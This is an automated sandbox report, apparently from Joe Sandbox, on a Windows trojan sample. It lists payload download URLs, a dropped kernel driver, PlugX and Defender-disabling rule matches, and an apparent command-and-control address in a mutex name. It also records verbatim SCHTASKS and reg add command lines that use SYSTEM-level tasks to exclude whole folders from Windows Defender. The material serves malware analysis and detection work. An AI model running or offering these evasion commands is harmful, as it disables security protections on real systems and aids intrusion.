Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifl
Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifp
Source: 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/b.gif
Source: 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/b.gifi
Source: 2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/
Source: 2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/A5
Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif
Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif
Source: 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif$
Source: 2976587-987347589.08.exe, 00000000.00000003.1791213251.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat(
Source: 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/j
Source: 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/pV
Source: 2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/v
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0)
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: 189atohci.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443

Source: unknown	HTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.9:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.9:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.9:49985 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.XY3LL0.exe.2890000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 42.2.byHW9q.exe.33c0000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: Process Memory Space: byHW9q.exe PID: 7708, type: MEMORYSTR	Matched rule: PlugX Identifying Strings Author: Seth Hardy

PE file contains section with special chars

Source: tbcore3U.dll.8.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.8.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.8.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.42.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.42.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.42.dr	Static PE information: section name: .mo:

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_0000000140006C95 NtAllocateVirtualMemory,

7_2_0000000140006C95

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,

7_2_0000000140001520

Source: C:\Users\user\Desktop\2976587-987347589.08.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\2976587-987347589.08.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\2976587-987347589.08.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_000000014000C3F0	7_2_000000014000C3F0
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_000000014000CC00	7_2_000000014000CC00
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_0000000140001A30	7_2_0000000140001A30
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_000000014000C2A0	7_2_000000014000C2A0
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_00000001400022C0	7_2_00000001400022C0
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_00000001400110F0	7_2_00000001400110F0
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_0000000140010CF0	7_2_0000000140010CF0
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_0000000140009300	7_2_0000000140009300
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_000000014000BB70	7_2_000000014000BB70
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_0000000140003F80	7_2_0000000140003F80
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_00000001400103D0	7_2_00000001400103D0
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_00007FF8FDF9A1B8	7_2_00007FF8FDF9A1B8
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_00007FF8FDFA0248	7_2_00007FF8FDFA0248
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Code function: 44_2_00634AE2	44_2_00634AE2

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\byHW9q\byHW9q.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722

Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
Source: 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
Source: 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
Source: 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
Source: 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
Source: 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
Source: 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
Source: 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f

Source: 7.2.XY3LL0.exe.2890000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 42.2.byHW9q.exe.33c0000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: Process Memory Space: byHW9q.exe PID: 7708, type: MEMORYSTR	Matched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12

Source: 189atohci.sys.0.dr	Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.troj.evad.winEXE@65/29@12/3

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,

7_2_0000000140003F80

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,

7_2_0000000140001430

Source: C:\Users\user\Documents\XY3LL0.exe

7_2_0000000140001520

Source: C:\Users\user\Documents\XY3LL0.exe

7_2_0000000140001520

Source: C:\Users\user\Documents\XY3LL0.exe

File created: C:\Program Files (x86)\byHW9q

Jump to behavior

Source: C:\Users\user\Desktop\2976587-987347589.08.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\i[1].dat

Jump to behavior

Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3492:120:WilError_03
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:356:120:WilError_03
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Mutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Mutant created: \Sessions\1\BaseNamedObjects\8.217.47.169:8917:Sauron
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Mutant created: \Sessions\1\BaseNamedObjects\aefd_888683
Source: C:\Users\user\Documents\XY3LL0.exe	Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1992:120:WilError_03
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC

Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Command line argument: ^wu	44_2_00631000
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Command line argument: tbcore3.dll	44_2_00631000
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Command line argument: tbcore3.dll	44_2_00631000
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Command line argument: tbcore3U.dll	44_2_00631000
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Command line argument: tbcore3U.dll	44_2_00631000
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Command line argument: .c	44_2_00632E30

Source: 2976587-987347589.08.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Documents\XY3LL0.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\2976587-987347589.08.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2976587-987347589.08.exe

Virustotal: Detection: 16%

Source: byHW9q.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: byHW9q.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: byHW9q.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: byHW9q.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: byHW9q.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: byHW9q.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta

Source: C:\Users\user\Desktop\2976587-987347589.08.exe

File read: C:\Users\user\Desktop\2976587-987347589.08.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\2976587-987347589.08.exe "C:\Users\user\Desktop\2976587-987347589.08.exe"
Source: unknown	Process created: C:\Users\user\Documents\XY3LL0.exe C:\Users\user\Documents\XY3LL0.exe
Source: unknown	Process created: C:\Users\user\Documents\XY3LL0.exe C:\Users\user\Documents\XY3LL0.exe
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Program Files (x86)\byHW9q\byHW9q.exe "C:\Program Files (x86)\byHW9q\byHW9q.exe"
Source: unknown	Process created: C:\Program Files (x86)\byHW9q\byHW9q.exe "C:\Program Files (x86)\byHW9q\byHW9q.exe"
Source: unknown	Process created: C:\Program Files (x86)\x736Pg9\QmbK8U.exe "C:\Program Files (x86)\x736Pg9\QmbK8U.exe"
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\byHW9q\byHW9q.exe "C:\Program Files (x86)\byHW9q\byHW9q.exe"
Source: unknown	Process created: C:\Program Files (x86)\x736Pg9\QmbK8U.exe "C:\Program Files (x86)\x736Pg9\QmbK8U.exe"
Source: unknown	Process created: C:\Program Files (x86)\byHW9q\byHW9q.exe "C:\Program Files (x86)\byHW9q\byHW9q.exe"
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
